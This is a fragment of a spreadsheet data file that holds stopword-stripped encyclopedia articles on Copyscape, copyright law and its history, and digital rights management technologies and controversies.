copyright, content question immediately removed. october 2005, paul litterick zealand association rationalists humanists used copyscape analyze bruce logan's published newspaper work, setting plagiarism scandal. litterick found logan's work taken cases permission) anglo-american sources, including heritage foundation, conservative christian fellowship, institute american values, digby anderson social affairs unit writers maggie gallagher melanie phillips. litterick published results fundy post (issues 19). logan retired maxim institute month later. december 2005, richard stiennon, writer zdnet, used copyscape find sites stolen re-published business plan written. references external links official website. copyscape forums. discussion about: copyright general. dealing plagiarism. copyscape.</t>
  </si>
  <si>
    <t>Copyright</t>
  </si>
  <si>
    <t>copyright type intellectual property gives owner exclusive right copy, distribute, adapt, display, perform creative work, usually limited time. creative work literary, artistic, educational, musical form. copyright intended protect original expression idea form creative work, idea itself. copyright subject limitations based public interest considerations, fair doctrine united states. some jurisdictions require "fixing" copyrighted works tangible form. often shared among multiple authors, holds rights license work, commonly referred rights holders. these rights frequently include reproduction, control derivative works, distribution, public performance, moral rights attribution.copyrights granted public case considered "territorial rights". this means copyrights granted certain state, extend beyond territory specific jurisdiction. copyrights type vary country; many countries, sometimes large group countries, made agreements countries procedures applicable works "cross" national borders national rights inconsistent.typically, public duration copyright expires years creator dies, depending jurisdiction. some countries require certain copyright formalities establishing copyright, others recognize copyright completed work, without formal registration. when copyright work expires, enters public domain. history background concept copyright developed printing press came europe 15th 16th centuries. printing press made much cheaper produce works, initially copyright law, anyone could rent press print text. popular works immediately re-set re-published competitors, printers needed constant stream material. fees paid authors works high, significantly supplemented incomes many academics.printing brought profound social changes. rise literacy across europe dramatic increase demand reading matter. prices reprints low, publications could bought poorer people, creating mass audience. german language markets advent copyright, technical materials, like popular fiction, inexpensive widely available; suggested contributed germany's industrial economic success. after copyright became established 1710 england scotland, 1840s german-speaking areas) low-price mass market vanished, fewer, expensive editions published; distribution scientific technical information greatly reduced. conception concept copyright first developed england. reaction printing "scandalous books pamphlets", english parliament passed licensing press 1662, required intended publications registered government-approved stationers' company, giving stationers right regulate material could printed.the statute anne, enacted 1710 england scotland provided first legislation protect copyrights (but authors' rights). copyright 1814 extended rights authors protect british reprinting berne international copyright convention 1886 finally provided protection authors among countries signed agreement, although join berne convention 1989.in constitution grants congress right establish copyright patent laws. shortly constitution passed, congress enacted copyright 1790, modeling statute anne. while national protected authors’ published works, authority granted states protect authors’ unpublished works. recent major overhaul copyright 1976 copyright act, extended federal copyright works soon created "fixed", without requiring publication registration. state continues apply unpublished works otherwise copyrighted federal law. this also changed calculation copyright term fixed term (then maximum fifty-six years) "life author plus years". these changes brought closer conformity berne convention, 1989 united states revised copyright joined berne convention officially.copyright laws allow products creative human activities, literary artistic production, preferentially exploited thus incentivized. different cultural attitudes, social organizations, economic models legal frameworks seen account copyright emerged europe not, example, asia. middle ages europe, generally lack concept literary property general relations production, specific organization literary production role culture society. latter refers tendency oral societies, europe medieval period, view knowledge product expression collective, rather individual property. however, copyright laws, intellectual production comes seen product individual, attendant rights. significant point patent copyright laws support expansion range creative human activities commodified. this parallels ways capitalism commodification many aspects social life earlier monetary economic value se.copyright developed concept significant effect nearly every modern industry, including literary work, also forms creative work sound recordings, films, photographs, software, architecture. national copyrights often seen first real copyright law, 1709 british statute anne gave publishers rights fixed period, copyright expired. also alluded individual rights artist. began, "whereas printers, booksellers, persons, late frequently taken liberty printing books, writings, without consent authors great detriment, often ruin families:". right benefit financially work articulated, court rulings legislation recognized right control work, ensuring integrity preserved. irrevocable right recognized work's creator appears countries' copyright laws. copyright clause united states, constitution (1787) authorized copyright legislation: promote progress science useful arts, securing limited times authors inventors exclusive right respective writings discoveries." that guaranteeing period time alone could profit works, would enabled encouraged invest time required create them, would good society whole. right profit work philosophical underpinning much legislation extending duration copyright, life creator beyond, heirs. original length copyright united states years, explicitly applied for. author wished, could apply second 14‑year monopoly grant, work entered public domain, could used built upon others. copyright enacted rather late german states, historian eckhard höffner argues absence copyright laws early 19th century encouraged publishing, profitable authors, proliferation books, enhanced knowledge, ultimately important factor ascendency germany power century. however, empirical evidence derived exogenous differential introduction copyright napoleonic italy shows "basic copyrights increased number quality operas, measured popularity durability". international copyright treaties 1886 berne convention first established recognition copyrights among sovereign nations, rather merely bilaterally. under berne convention, copyrights creative works asserted declared, automatically force creation: author need "register" "apply for" copyright countries adhering berne convention. soon work "fixed", written recorded physical medium, author automatically entitled copyrights work, derivative works unless author explicitly disclaims them, copyright expires. berne convention also resulted foreign authors treated equivalently domestic authors, country signed onto convention. signed berne convention 1887 implement large parts years later passage copyright, designs patents 1988. specially, educational scientific research purposes, berne convention provides developing countries issue compulsory licenses translation reproduction copyrighted works within limits prescribed convention. this special provision added time 1971 revision convention, strong demands developing countries. united states sign berne convention 1989.the united states latin american countries instead entered buenos aires convention 1910, required copyright notice work (such rights reserved), permitted signatory nations limit duration copyrights shorter renewable terms. universal copyright convention drafted 1952 another less demanding alternative berne convention, ratified nations soviet union developing nations. regulations berne convention incorporated world trade organization's trips agreement (1995), thus giving berne convention effectively near-global application.in 1961, united international bureaux protection intellectual property signed rome convention protection performers, producers phonograms broadcasting organizations. 1996, organization succeeded founding world intellectual property organization, launched 1996 wipo performances phonograms treaty 2002 wipo copyright treaty, enacted greater restrictions technology copy works nations ratified trans-pacific partnership includes intellectual property provisions relating copyright. copyright laws standardized somewhat international conventions berne convention universal copyright convention. these multilateral treaties ratified nearly countries, international organizations european union world trade organization require member states comply them. obtaining protection ownership original holder copyright employer author rather author work "work hire". example, english copyright, designs patents 1988 provides copyrighted work made employee course employment, copyright automatically owned employer would "work hire". typically, first owner copyright person created work i.e. author. person creates work, case joint authorship made provided criteria met. eligible works copyright apply wide range creative, intellectual, artistic forms, "works". specifics vary jurisdiction, include poems, theses, fictional characters, plays literary works, motion pictures, choreography, musical compositions, sound recordings, paintings, drawings, sculptures, photographs, computer software, radio television broadcasts, industrial designs. graphic designs industrial designs separate overlapping laws applied jurisdictions.copyright cover ideas information themselves, form manner expressed. example, copyright mickey mouse cartoon restricts others making copies cartoon creating derivative works based disney's particular anthropomorphic mouse, prohibit creation works anthropomorphic mice general, long different enough judged copies disney's. note additionally mickey mouse copyrighted characters cannot copyrighted; rather, steamboat willie copyrighted mickey mouse, character copyrighted work, afforded protection. originality typically, work must meet minimal standards originality order qualify copyright, copyright expires period time (some jurisdictions allow extended). different countries impose different tests, although generally requirements low; united kingdom "skill, labour, judgment" gone australia united kingdom held single word insufficient comprise copyright work. however, single words short string words sometimes registered trademark instead. copyright recognizes right author based whether work actually original creation, rather based whether unique; authors copyright substantially identical works, determined duplication coincidental, neither copied other. registration countries berne convention standards apply, copyright automatic, need obtained official registration government office. once idea reduced tangible form, example securing fixed medium (such drawing, sheet music, photograph, videotape, computer file), copyright holder entitled enforce exclusive rights. however, registration needed exercise copyright, jurisdictions laws provide registration, serves prima facie evidence valid copyright enables copyright holder seek statutory damages attorney's fees. registering infringement enables receive actual damages lost profits.) widely circulated strategy avoid cost copyright registration referred poor man's copyright. proposes creator send work sealed envelope registered mail, using postmark establish date. this technique recognized published opinions united states courts. united states copyright office says technique substitute actual registration. united kingdom intellectual property office discusses technique notes technique well commercial registries) constitute dispositive proof work original establish created work. fixing berne convention allows member countries decide whether creative works must "fixed" enjoy copyright. article section berne convention states: shall matter legislation countries union prescribe works general specified categories works shall protected unless fixed material form." some countries require work produced particular form obtain copyright protection. instance, spain, france, australia require fixation copyright protection. united states canada, hand, require works must "fixed tangible medium expression" obtain copyright protection. requires fixation stable permanent enough "perceived, reproduced communicated period transitory duration". similarly, canadian courts consider fixation require work "expressed extent least material form, capable identification less permanent endurance".note provision law: effect berne convention.—no right interest work eligible protection title claimed virtue reliance upon, provisions berne convention, adherence united states thereto. rights work eligible protection title derive title, federal state statutes, common law, shall expanded reduced virtue reliance upon, provisions berne convention, adherence united states thereto. copyright notice before 1989, united states required copyright notice, consisting copyright symbol letter inside circle), abbreviation "copr.", word "copyright", followed year first publication work name copyright holder. several years noted work gone substantial revisions. proper copyright notice sound recordings musical audio works sound recording copyright symbol letter inside circle), indicates sound recording copyright, letter indicating "phonorecord". addition, phrase rights reserved required assert copyright, phrase legally obsolete. almost everything internet sort copyright attached whether things watermarked, signed, sort indication copyright different story however.in 1989 united states enacted berne convention implementation act, amending 1976 copyright conform provisions berne convention. result, copyright notices become optional claim copyright, berne convention makes copyright automatic. however, lack notice copyright using marks consequences terms reduced damages infringement lawsuit using notices form reduce likelihood defense "innocent infringement" successful. enforcement copyrights generally enforced holder civil court, also criminal infringement statutes jurisdictions. while central registries kept countries proving claims ownership, registering necessarily prove ownership, fact copying (even without permission) necessarily prove copyright infringed. criminal sanctions generally aimed serious counterfeiting activity, becoming commonplace copyright collectives riaa increasingly targeting file sharing home internet user. thus far, however, cases file sharers settled court. (see legal aspects file sharing) jurisdictions copyright holder must bear cost enforcing copyright. this usually involve engaging legal representation, administrative court costs. light this, many copyright disputes settled direct approach infringing party order settle dispute court. "...by 1978, scope expanded apply 'expression' 'fixed' medium, protection granted automatically whether maker wants not, registration required." copyright infringement work considered infringe upon copyright, must occurred nation domestic copyright laws adheres bilateral treaty established international convention berne convention wipo copyright treaty. improper materials outside legislation deemed "unauthorized edition", copyright infringement.statistics regarding effects copyright infringement difficult determine. studies attempted determine whether monetary loss industries affected copyright infringement predicting portion pirated works would formally purchased freely available. other reports indicate copyright infringement adverse effect entertainment industry, positive effect. particular, 2014 university study concluded free music content, accessed youtube, necessarily hurt sales, instead potential increase sales.according commission report annual cost intellectual property theft economy "continues exceed $225 billion counterfeit goods, pirated software, theft trade secrets could high $600 billion." 2019 study sponsored chamber commerce global innovation policy center (gipc), partnership nera economic consulting "estimates global online piracy costs u.s. economy least $29.2 billion lost revenue year." august 2021 report digital citizens alliance states "online criminals offer stolen movies, shows, games, live events websites apps reaping $1.34 billion annual advertising revenues." this comes result users visiting pirate websites subjected pirated content, malware, fraud. rights granted according world intellectual property organisation, copyright protects types rights. economic rights allow right owners derive financial reward works others. moral rights allow authors creators take certain actions preserve protect link work. author creator owner economic rights rights transferred copyright owners. many countries allow transfer moral rights. economic rights with kind property, owner decide used, others lawfully owner's permission, often license. owner's property must, however, respect legally recognised rights interests members society. owner copyright-protected work decide work, prevent others using without permission. national laws usually grant copyright owners exclusive rights allow third parties works, subject legally recognised rights interests others. most copyright laws state authors right owners right authorise prevent certain acts relation work. right owners authorise prohibit: reproduction work various forms, printed publications sound recordings; distribution copies work; public performance work; broadcasting communication work public; translation work languages; adaptation work, turning novel screenplay. moral rights moral rights concerned non-economic rights creator. they protect creator's connection work well integrity work. moral rights accorded individual authors many national laws remain authors even authors transferred economic rights. countries, france, moral rights last indefinitely. however, moral rights finite. that right attribution right integrity last long work copyright. when copyright term comes end, moral rights work. this reason moral rights regime within often regarded weaker inferior protection moral rights continental europe elsewhere world. berne convention, article 6bis, requires members grant authors following rights: right claim authorship work (sometimes called right paternity right attribution); right object distortion modification work, derogatory action relation work, would prejudicial author's honour reputation (sometimes called right integrity).these similar rights granted national laws generally known moral rights authors. berne convention requires rights independent authors’ economic rights. moral rights accorded individual authors many national laws remain authors even authors transferred economic rights. this means even where, example, film producer publisher owns economic rights work, many jurisdictions individual author continues moral rights. recently, part debates held copyright office question inclusion moral rights part framework copyright united states, copyright office concluded many diverse aspects current moral rights patchwork including copyright law's derivative work right, state moral rights statutes, contract generally working well changed. further, office concludes need creation blanket moral rights statute time. however, aspects moral rights patchwork could improved benefit individual authors copyright system whole.the copyright united states, several exclusive rights granted holder copyright, listed below: protection work; determine decide how, conditions, work marketed, publicly displayed, reproduced, distributed, etc. produce copies reproductions work sell copies; (including, typically, electronic copies) import export work; create derivative works; (works adapt original work) perform display work publicly; sell cede rights others; transmit display radio, video internet.the basic right work protected copyright holder determine decide conditions protected work used others. this includes right decide distribute work free. this part copyright often overseen. phrase "exclusive right" means copyright holder free exercise rights, others prohibited using work without holder's permission. copyright sometimes called "negative right", serves prohibit certain people (e.g., readers, viewers, listeners, primarily publishers would publishers) something would otherwise able rather permitting people (e.g., authors) something would otherwise unable similar unregistered design right english european law. rights copyright holder also permit him/her exploit copyright, term. there however, critique rejects assertion based philosophical interpretation copyright universally shared. there also debate whether copyright considered property right moral right.uk copyright gives creators economic rights moral rights. while ‘copying’ someone else's work without permission constitute infringement economic rights, reproduction right right communication public, whereas, ‘mutilating’ might infringe creator's moral rights. moral rights include right identified author work, generally identified right attribution, right work subjected ‘derogatory treatment’, right integrity.indian copyright parity international standards contained trips. indian copyright act, 1957, pursuant amendments 1999, 2002 2012, fully reflects berne convention universal copyrights convention, india party. india also party geneva convention protection rights producers phonograms active member world intellectual property organization (wipo) united nations educational, scientific cultural organization (unesco). indian system provides economic moral rights different provisions indian copyright 1957. duration copyright subsists variety lengths different jurisdictions. length term depend several factors, including type work (e.g. musical composition, novel), whether work published, whether work created individual corporation. world, default length copyright life author plus either years. united states, term existing works fixed number years date creation publication. under countries' laws (for example, united states united kingdom), copyrights expire calendar year would otherwise expire. length requirements copyright duration subject change legislation, since early 20th century number adjustments made various countries, make determining duration given copyright somewhat difficult. example, united states used require copyrights renewed years stay force, formerly required copyright notice upon first publication gain coverage. italy france, post-wartime extensions could increase term approximately years italy france. many countries extended length copyright terms (sometimes retroactively). international treaties establish minimum terms copyrights, individual countries enforce longer terms those.in united states, books works, except sound recordings, published 1926 expired copyrights public domain. applicable date sound recordings united states 1923. addition, works published 1964 copyrights renewed years first publication year also public domain. hirtle points great majority works (including books) renewed years public domain. books originally published outside non-americans exempt renewal requirement, still copyright home country. intended exploitation work includes publication distribution derivative work, film based book protected copyright) outside terms copyright around world must considered. author dead years, work public domain most, all, countries. 1998, length copyright united states increased years copyright term extension act. this legislation strongly promoted corporations valuable copyrights otherwise would expired, subject substantial criticism point. limitations exceptions many jurisdictions, copyright makes exceptions restrictions work copied purpose commentary related uses. united states copyright cover names, titles, short phrases listings (such ingredients, recipes, labels, formulas). however, protections available areas copyright cover, trademarks patents. idea–expression dichotomy merger doctrine idea–expression divide differentiates ideas expression, states copyright protects original expression ideas, ideas themselves. this principle, first clarified 1879 case baker selden, since codified copyright 1976 u.s.c. 102(b). first-sale doctrine exhaustion rights copyright restrict owner copy reselling legitimately obtained copies copyrighted works, provided copies originally produced permission copyright holder. therefore legal, example, resell copyrighted book united states known first-sale doctrine, established courts clarify legality reselling books second-hand bookstores. some countries parallel importation restrictions allow copyright holder control aftermarket. this mean example copy book infringe copyright country printed infringe copyright country imported retailing. first-sale doctrine known exhaustion rights countries principle also applies, though somewhat differently, patent trademark rights. important note first-sale doctrine permits transfer particular legitimate copy involved. permit making distributing additional copies. kirtsaeng john wiley sons, inc., 2013, united states supreme court held decision first-sale doctrine applies goods manufactured abroad copyright owner's permission imported without permission. case involved plaintiff imported asian editions textbooks manufactured abroad publisher-plaintiff's permission. defendant, without permission publisher, imported textbooks resold ebay. supreme court's holding severely limits ability copyright holders prevent importation. addition, copyright, cases, prohibit acts modifying, defacing, destroying legitimately obtained copy copyrighted work, long duplication involved. however, countries implement moral rights, copyright holder cases successfully prevent mutilation destruction work publicly visible. fair fair dealing copyright prohibit copying replication. united states, fair doctrine, codified copyright 1976 u.s.c. section 107, permits copying distribution without permission copyright holder payment same. statute clearly define fair use, instead gives four non-exclusive factors consider fair analysis. those factors are: purpose character one's use; nature copyrighted work; amount proportion whole work taken; effect upon potential market value copyrighted work.in united kingdom many commonwealth countries, similar notion fair dealing established courts legislation. concept sometimes well defined; however canada, private copying personal expressly permitted statute since 1999. alberta (education) canadian copyright licensing agency (access copyright), 2012 supreme court canada concluded limited copying educational purposes could also justified fair dealing exemption. australia, fair dealing exceptions copyright 1968 (cth) limited circumstances copyrighted material legally copied adapted without copyright holder's consent. fair dealing uses research study; review critique; news reportage giving professional advice (i.e. legal advice). under current australian law, although still breach copyright copy, reproduce adapt copyright material personal private without permission copyright owner, owners legitimate copy permitted "format shift" work medium another personal, private use, "time shift" broadcast work later, once, viewing listening. other technical exemptions infringement also apply, temporary reproduction work machine readable form computer. united states ahra (audio home recording codified section 1992) prohibits action consumers making noncommercial recordings music, return royalties media devices plus mandatory copy-control mechanisms recorders. section 1008. prohibition certain infringement actions action brought title alleging infringement copyright based manufacture, importation, distribution digital audio recording device, digital audio recording medium, analog recording device, analog recording medium, based noncommercial consumer device medium making digital musical recordings analog musical recordings. later acts amended copyright certain purposes making copies construed commercial, general rule permitting copying. indeed, making complete copy work, many cases using portion commercial purposes considered fair use. digital millennium copyright prohibits manufacture, importation, distribution devices whose intended use, significant commercial use, bypass access copy control place copyright owner. appellate court held fair defense engaging distribution.eu copyright laws recognise right member states implement national exceptions copyright. examples exceptions are: photographic reproductions paper similar medium works (excluding sheet music) provided rightholders receives fair compensation; reproduction made libraries, educational establishments, museums archives, non-commercial; archival reproductions broadcasts; uses benefit people disability; demonstration repair equipment; non-commercial research private study; used parody. accessible copies legal several countries including united kingdom united states produce alternative versions (for example, large print braille) copyrighted work provide improved access work blind visually impaired people without permission copyright holder. religious service exemption religious service exemption (1976 law, section 110[3]), namely "performance non-dramatic literary musical work dramatico-musical work religious nature display work, course services place worship religious assembly" shall constitute infringement copyright. transfer, assignment licensing copyright, aspects (e.g. reproduction alone, moral rights), assigned transferred party another. example, musician records album often sign agreement record company musician agrees transfer copyright recordings exchange royalties considerations. creator (and original copyright holder) benefits, expects production marketing capabilities beyond author. digital music, music copied distributed minimal cost internet; however, record industry attempts provide promotion marketing artist work reach much larger audience. copyright holder need transfer rights completely, though many publishers insist. some rights transferred, else copyright holder grant another party non-exclusive license copy distribute work particular region specified period time. transfer licence meet particular formal requirements order effective, example australian copyright 1968 copyright must expressly transferred writing. under copyright act, transfer ownership copyright must memorialized writing signed transferor. purpose, ownership copyright includes exclusive licenses rights. thus exclusive licenses, effective, must granted written instrument signed grantor. special form transfer grant required. simple document identifies work involved rights granted sufficient. non-exclusive grants (often called non-exclusive licenses) need writing law. they oral even implied behavior parties. transfers copyright ownership, including exclusive licenses, recorded u.s. copyright office. (information recording transfers available office's site.) while recording required make grant effective, offers important benefits, much like obtained recording deed real estate transaction. copyright also licensed. some jurisdictions provide certain classes copyrighted works made available prescribed statutory license (e.g. musical works united states used radio broadcast performance). this also called compulsory license, scheme, anyone wishes copy covered work need permission copyright holder, instead merely files proper notice pays established statute agency decision statutory guidance) every copy made. failure follow proper procedures would place copier risk infringement suit. because difficulty following every individual work, copyright collectives collecting societies performing rights organizations (such ascap, bmi, sesac) formed collect royalties hundreds (thousands more) works once. though market solution bypasses statutory license, availability statutory still helps dictate price work collective rights organizations charge, driving avoidance procedural hassle would justify. free licenses copyright licenses known open free licenses seek grant several rights licensees, either not. free context much reference price freedom. what constitutes free licensing characterised number similar definitions, including order longevity free software definition, debian free software guidelines, open source definition definition free cultural works. further refinements definitions resulted categories copyleft permissive. common examples free licences general public license, licenses creative commons licenses. founded 2001 james boyle, lawrence lessig, abelson, creative commons (cc)</t>
  </si>
  <si>
    <t>Digital rights management</t>
  </si>
  <si>
    <t>digital rights management (drm) management legal access digital content. various tools technological protection measures (tpm) access control technologies restrict proprietary hardware copyrighted works. technologies govern use, modification, distribution copyrighted works (such software multimedia content), well systems enforce policies within devices.laws many countries criminalize circumvention drm, communication circumvention, creation distribution tools used circumvention. such laws part united states' digital millennium copyright (dmca), european union's information society directive (the french dadvsi example member state european union implementing directive).drm techniques include licensing agreements encryption.the industry expanded usage various hardware products, keurig's coffeemakers, philips' light bulbs, mobile device power chargers, john deere's tractors. instance, tractor companies prevent farmers making repairs drm.drm users argue technology necessary protect intellectual property, physical locks prevent personal property theft, help copyright holder maintain artistic control, support licensing modalities rentals.drm without controversy. critics contend evidence proves helps prevent copyright infringement, arguing serves inconvenience legitimate customers, stifle innovation competition. furthermore, works become permanently inaccessible scheme changes required service discontinued. technologies criticized restricting individuals copying using content legally, fair making backup copies. common entertainment industry (e.g., audio video publishers). many online stores overdrive, technologies, cable satellite service operators. apple removed technology itunes around 2009. typical also prevents lending materials library, accessing works public domain. introduction rise digital media analog-to-digital conversion technologies increased concerns copyright-owners, particularly within music video industries. while analog media inevitably lose quality copy generation normal use, digital media files duplicated without limit degradation. digital devices make convenient consumers convert (rip) media originally physical, analog broadcast form digital form portability later use. combined internet file-sharing tools, made unauthorized distribution copyrighted content (digital piracy) much easier. history became major concern growth internet 1990s, piracy crushed sales online video became popular. peaked early 2000s various countries attempted respond legislation regulations dissipated 2010s social media, streaming services largely replaced piracy content providers elaborated next-generation business models. early efforts 1983, software service system (sss) devised japanese engineer ryuichi moriya first example technology. subsequently refined name superdistribution. based encryption, specialized hardware controlled decryption enabled payments sent copyright holder. underlying principle physical distribution encrypted digital products completely unrestricted users products would encouraged so.an early protection method computer nintendo entertainment system games game would pause prompt player look certain page booklet manual came game; player lacked access material, would able continue. early example system content scramble system (css) employed forum movies. uses encryption algorithm encrypt content disc. manufacturers players must license technology implement devices decrypt content. license agreement includes restrictions content played, including outputs permitted permitted outputs made available. this keeps encryption intact content displayed.in 1998, digital millennium copyright (dmca) passed amendment copyright law. controversial (possibly unintended) implications. russian programmer dmitry sklyarov arrested alleged dmca infringement presentation con. dmca cited chilling legitimate users; security consultants including niels ferguson, declined publish vulnerabilities discovered intel's secure-computing scheme fear arrest dmca; blind visually impaired users screen readers assistive technologies.in 1999, lech johansen released decss, allowed css-encrypted play computer running linux, time compliant player linux created. legality decss questionable: authors sued, reproduction keys subject restrictions illegal numbers.more modern examples include adept, fairplay, advanced access content system. world intellectual property organization copyright treaty (wct) passed 1996. digital millennium copyright (dmca), passed 1998. european union enacted information society directive. 2006, lower house french parliament adopted legislation part controversial dadvsi law, added protected techniques made interoperable, move caused widespread controversy united states. tribunal grande instance paris concluded 2006, complete blocking possibilities making private copies impermissible behaviour french copyright law. 2000s broadcast flag concept developed broadcasting 2001, supported mpaa u.s. federal communications commission (fcc). ruling 2005 united states courts appeals held lacked authority impose industry. required hdtvs obey stream specification determining whether stream recorded. this could block instances fair use, time-shifting. achieved success elsewhere adopted digital video broadcasting project (dvb), consortium broadcasters, manufacturers, network operators, software developers, regulatory bodies countries involved attempting develop digital standards. january 2001 workshop digital rights management world wide consortium held.on 2001, european union passed information society directive, copyright protections. 2003 european committee standardization/information society standardization system (cen/isss) report published.in 2004 consultation process european commission, internal market, communication com(2004)261 european commission "management copyright related rights" closed.in 2005 workshops directorate-general information society media (european commission), work high level group held.in 2005, sony installed software users' computers without clearly notifying user requiring confirmation. among things, software included rootkit, created security vulnerability. when nature software made public much later, sony initially minimized significance vulnerabilities, eventually recalled millions cds, made several attempts patch software remove rootkit. class action lawsuits filed, ultimately settled agreements provide affected consumers cash payout album downloads free drm.microsoft's media player zune released 2006 support content used microsoft's playsforsure scheme.tools like fairuse4wm strip windows media restrictions.the gowers review intellectual property british government andrew gowers published 2006 recommendations regarding copyright terms, exceptions, orphaned works, copyright enforcement. (dvb-cpcm) updated variant broadcast flag. technical specification submitted european governments march 2007. much drm, cpcm system intended control copyrighted material end-user, direction copyright holder. according bucholz electronic frontier foundation (eff), "you even know ahead time whether able record make particular programs devices". normative sections approved publication steering board, formalized etsi formal european standard 825-x) refers part number. nobody stepped forward provide compliance robustness regime standard, presently possible fully implement system, supplier device certificates emerged. december 2006 industrial-grade advanced access content system (aacs) blu-ray discs, process published hackers, enabled unrestricted access aacs-protected content.in 2007, european parliament supported eu's direction copyright protection. notable failure happened 2007, videos purchased major league baseball prior 2006 became unplayable change servers validate licenses.in 2007, radiohead released rainbows, fans could choose amount paid, download free.asus released soundcard features function called "analog loopback transformation" bypass restrictions drm. this feature allows user record drm-restricted audio soundcard's built-in analog connection.apple inc. made music drm-free april 2007 labeled music "drm-free" 2008. other works sold itunes apps, audiobooks, movies, shows protected drm.in january 2007, stopped publishing audio drm, stating "the costs measure results." march, musicload.de, europe's largest internet music retailers, announced position strongly drm. open letter, musicload stated three every four calls customer support phone service result consumer frustration drm.digital distributor gog.com (formerly good games) specializes video games strict non-drm policy.baen books o'reilly media, dropped prior 2012, books, major publisher science fiction fantasy books, first sold drm-free e-books.the axmedis project completed 2008. european commission integrated project fp6, main goal automating content production, copy protection, distribution, reduce related costs, support areas, harmonizing them. indicare project dialogue consumer acceptability solutions europe completed 2008. mid-2008, windows version mass effect marked start wave titles primarily making securom requiring authentication server. scheme 2008's spore protests, resulting searches unlicensed version. this backlash activation limit spore become pirated game 2008, topping list compiled torrentfreak. however, tweakguides concluded appear increase video game piracy, noting games list, call duty assassin's creed, without limits online activation. additionally, video games drm, bioshock, crysis warhead, mass effect, appear list.many mainstream publishers continued rely online throughout later half 2008 early 2009, including electronic arts, ubisoft, valve, atari, sims notable exception case electronic arts. ubisoft broke tendency online late 2008, release prince persia experiment "see truthful people really are" regarding claim inciting people illegal copies. although ubisoft commented results "experiment", tweakguides noted torrents mininova 23,000 people downloading game within hours release.in 2009 amazon.com remotely deleted purchased copies george orwell's animal farm (1945) nineteen eighty-four (1949) customers' amazon kindles refunding purchase price. commentators described actions orwellian compared amazon brother nineteen eighty-four. amazon jeff bezos issued public apology. wrote example excessive power amazon remotely censor content, called upon amazon drop drm. amazon revealed reason behind deletion: e-books question unauthorized reproductions orwell's works, within public domain company published sold amazon's service right 2010- ubisoft formally announced return online authentication february 2010, uplay online game platform, starting silent hunter settlers assassin's creed silent hunter first reported compromised within hours release, users cracked version soon found early parts game playable. uplay system works installed game local incomplete continuously downloading parts game code ubisoft's servers game progresses. month release first week april software released could bypass ubisoft's assassin's creed software emulating ubisoft server game. later month, real crack released able remove connection requirement altogether.in march 2010, uplay servers suffered period inaccessibility large-scale ddos attack, causing around game owners become locked playing game. company later credited owners affected games free download, downtime.in 2011 comedian louis c.k. released concert film live beacon theater inexpensive (us$5), drm-free download. attempt deter unlicensed copies letter emphasizing lack corporate involvement direct relationship artist viewer. film commercial success, turning profit within hours release. artist suggested piracy rates lower normal result, making release important case study digital marketplace.in 2012, court justice ruled favor reselling copyrighted games.in 2012 india implemented digital rights management protection.in 2012 webcomic diesel sweeties released drm-free e-book. followed drm-free ibook specifically ipad generated 10,000 downloads three days. that stevens launch kickstarter project "ebook stravaganza 3000" fund conversion 3,000 comics, written years, single "humongous" e-book released free ibookstore; launched february 2012, goal raising $3,000 days. "payment optional" drm-free model case adopted stevens' view "there class webcomics reader would prefer read large chunks and, even better, would willing spend little money it."in february 2012, double fine asked crowdfunding upcoming video game, double fine adventure, kickstarter offered game drm-free backers. this project exceeded original goal $400,000 days, raising excess million. crowdfunding acted pre-order alternatively subscription. after success double fine adventure, many games crowd-funded many offered drm-free version.websites library.nu (shut court order february 2012), bookfi, bookfinder, library genesis, sci-hub allowed e-book downloading violating copyright.as 2013 developers, blizzard entertainment game logic "side" taken care servers game maker. blizzard uses strategy game diablo electronic arts used strategy reboot simcity, necessity questioned.windows media drm, reads instructions media files rights management language states user media. later versions windows media implemented music subscription services make downloaded files unplayable subscriptions cancelled, along ability regional lockout.in 2014, court justice ruled circumventing game devices legal circumstances.in 2014, digital comic distributor comixology allowed rights holders provide option drm-free downloads. publishers allow include dynamite entertainment, image comics, thrillbent, shelf productions, zenescope entertainment. technologies verification product keys product key, typically alphanumerical string, represent license particular copy software. during installation process software launch, user asked enter key; valid (typically internal algorithms), accepted, user continue. product keys combined practices (such online "activation"), prevent cracking software without product key, using keygen generate acceptable keys. activation limits limit number devices legal user install content. this restriction typically support devices. this affects users devices limit. some allow device replaced another. without software hardware upgrades require additional purchase. persistent online always-on checks rechecks authorization content interacting server operated copyright holder. cases, part content actually installed, rest downloaded dynamically use. encryption encryption alters content means used without first decrypting encryption ensure restriction measures cannot bypassed modifying software, systems typically rely encryption addition techniques. copy restriction microsoft playready prevents illicit copying multimedia files.restrictions applied electronic books documents, order prevent copying, printing, forwarding, creating backup copies. this common e-publishers enterprise information rights management. typically integrates content management system software.while commentators claim complicates e-book publishing, used organizations british library secure electronic delivery service permit worldwide access rare documents which, legal reasons, previously available authorized individuals actually visiting library's document centre.four main e-book schemes common use, adobe, amazon, apple, marlin trust management organization (mtmo). adobe's applied epubs pdfs, read several third-party e-book readers, well adobe digital editions (ade) software. barnes noble uses technology provided adobe, applied epubs older (palm format e-books. amazon's adaption original mobipocket encryption applied amazon's .azw4, kf8, mobipocket format e-books. topaz format e-books encryption system. apple's fairplay applied epubs read apple's ibooks devices computers. marlin developed maintained open industry group marlin developer community (mdc) licensed mtmo. (marlin founded intertrust, panasonic, philips, samsung, sony.) online textbook publisher uses marlin protect epub books. these books read android. runtime restrictions windows vista contains system called protected media path, contains protected video path (pvp). tries stop drm-restricted content playing unsigned software running, order prevent unsigned software accessing content. additionally, encrypt information transmission monitor graphics card, makes difficult make unauthorized recordings. bohemia interactive used form technology since operation flashpoint: cold crisis, wherein game copy suspected unauthorized, annoyances like guns losing accuracy players turning bird introduced. croteam's serious causes special invincible game appear constantly attack player killed. regional lockout regional lockout region coding) prevents certain product service, except specific region territory. lockout enforced physical means, technological means inspecting user's address using identifying code, unintentional means introduced devices support region-specific technologies (such video formats, i.e., ntsc pal). tracking watermarks digital watermarks steganographically embedded within audio video data. they used recording copyright owner, distribution chain identifying purchaser. they complete mechanisms right, used part system copyright enforcement, helping provide evidence legal purposes, rather enforcing restrictions.some audio/video editing programs distort, delete, otherwise interfere watermarks. signal/modulator-carrier chromatography separate watermarks recording detect glitches. additionally, comparison separately obtained copies audio using basic algorithms reveal watermarks. metadata sometimes, metadata included purchased media records information purchaser's name, account information, email address. also included file's publisher, author, creation date, download date, various notes. this information embedded content, watermark kept separate content, within file stream. example, metadata used media purchased itunes drm-free well drm-restricted content. this information included mpeg standard metadata. hardware cable television set-top boxes require specific piece hardware operate. cablecard standard used restrict content services customer subscribed. content embedded broadcast flag card examines decide whether content viewed specific user. implementations addition, platforms steam include mechanisms. most mechanisms copy protection mechanisms rather 